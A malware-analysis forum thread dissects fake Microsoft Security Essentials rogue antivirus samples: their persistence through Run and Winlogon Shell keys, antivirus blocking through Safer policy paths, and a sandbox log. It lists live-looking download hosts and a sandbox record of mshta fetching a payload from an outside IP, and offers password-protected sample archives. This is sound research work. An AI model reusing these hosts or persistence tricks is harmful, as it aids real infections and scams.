[EP_X0FF]

Copy-paste GUI clone of Microsoft Security Essential. This is not simple alike clone (like Security Essentials) - this is full UI copy of MSE.
Written on Delphi (cryptor + UPX inside).

VirusTotal
http://www.virustotal.com/analisis/1840 ... 1273465045

GUI / Detections / Give me money dialog







Dropped with legit MSE components to %Documents and Settings%\UserName\Application Data\Microsoft Security Essentials,
autorun through HKCU\Software\Microsoft\Windows\CurrentVersion\Run

That's how all this looking after unpacking :D

[B-boy/StyLe/]

Look like, this one lock down some antivirus as well: :lol:



Inherit.exe by sUBs should be useful here ?

Regards,
G.

[nullptr]

It's just adding the paths to any software in its db to HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths

[EP_X0FF]

egomoo post about Security Essentials 2010 moved to dedicated topic because it is not really the same MSE fake.
It is more likely KAV/KIS parody fake av.

[Jaxryley]

Malwarebytes - Trojan.FakeMSE

Code: Select all

hxxp://193.105.174.114:8081/file/h2.exe

h2.exe - Result: 7/42 (16.67%) - MD5...: 9a9dc806aa69c9bbc8159364f52ef999
http://www.virustotal.com/analisis/2626 ... 1278939818

h2.rar

Pass:
infected
(202 KiB) Downloaded 86 times

[EP_X0FF]

Another one interesting sample, written on Delphi, packed with UPX 3.05, has Russian origin (according code analysis).

http://www.virustotal.com/file-scan/rep ... 1284892543

Fake MSE detection dialog.



Then it shows dialog with fake "Online" scan.



Of course everybody blind except few fake AV - "solution found".
When you press install button dropper simulates downloading process and installation wizard appears next. When "installation" complete, system forced to reboot.
After reboot, this displayed on a full screen.



Finally real fake av GUI displayed.



Fake AV runs from X:\Documents and Settings\UserName\Application Data\ as hotfix.exe
Running through registry key HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell


As bonus has specific hidden form with all fake av's labels stored :)

[CloneRanger]

At least they look quite good these days, even if they don't do ANY good

It's not surprising a lot of people get fooled by them. The sad thing is, many people don't actually care too much about security etc when it comes right down to it. Oh they say they do, but as i keep finding out week after week, in reality it's too much trouble for them to learn, they just want to click and go ASAP :( Still as long as they keep paying, why should i worry any more if they won't help themselves

I don't see any end in sight to Rogues infecting and ripping off people, for some time to come, due to the above. Apart from trying to educate people, i don't know what the 100% solution is, and niether do the AV etc vendors !

[Jaxryley]

A dozen or so installers for the fake MSE alert.

Microsoft Security Essentials Alert.rar

(3.87 MiB) Downloaded 85 times

Microsoft Security Essentials Alert 2.rar

(3.86 MiB) Downloaded 70 times

[Jaxryley]

Microsoft Security Essentials fake alert has changed tact in that it asks for a reboot to finish the install then reboots into a blank desktop with no taskbar with just the rogue's gui sitting there.

Still the same in safe mode so if this gets installed on a machine then it seems that you will have to boot from a live cd and remove the hotfix.exe to get the machine back?

setup.exe - 6/42 - MD5 : fdbf10c74f93279411d7b2232d433138
http://www.virustotal.com/file-scan/rep ... 1287306939

setup.rar

(495.04 KiB) Downloaded 78 times

Buster Sandbox Analyzer:

Detailed report of suspicious malware actions:

Created process: (null),C:\Users\Administrator\AppData\Roaming\1310.bat,C:\Users\Administrator\Desktop\
Created process: C:\Windows\System32\mshta.exe,"C:\Windows\System32\mshta.exe" !http://85.234.191.185/inst.php?id=02915 ... or\Desktop
Defined file type created: C:\Users\Administrator\AppData\AppData\Roaming\hotfix.exe
Defined file type created: C:\Users\Administrator\AppData\Desktop\setup.exe
Defined registry AutoStart location added or modified: user\current\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = C:\Users\Administrator\AppData\Roaming\hotfix.exe
Detected backdoor listening on port: 0
Detected keylogger functionality
Detected process privilege elevation
Internet connection: C:\Windows\System32\mshta.exe Connects to "85.234.191.185" on port 80 (TCP - HTTP).
Listed all entry names in a remote access phone book
Opened a service named: rasman
Opened a service named: Sens

Risk evaluation result: High

[4r0]

Please check attached file.
Password: infected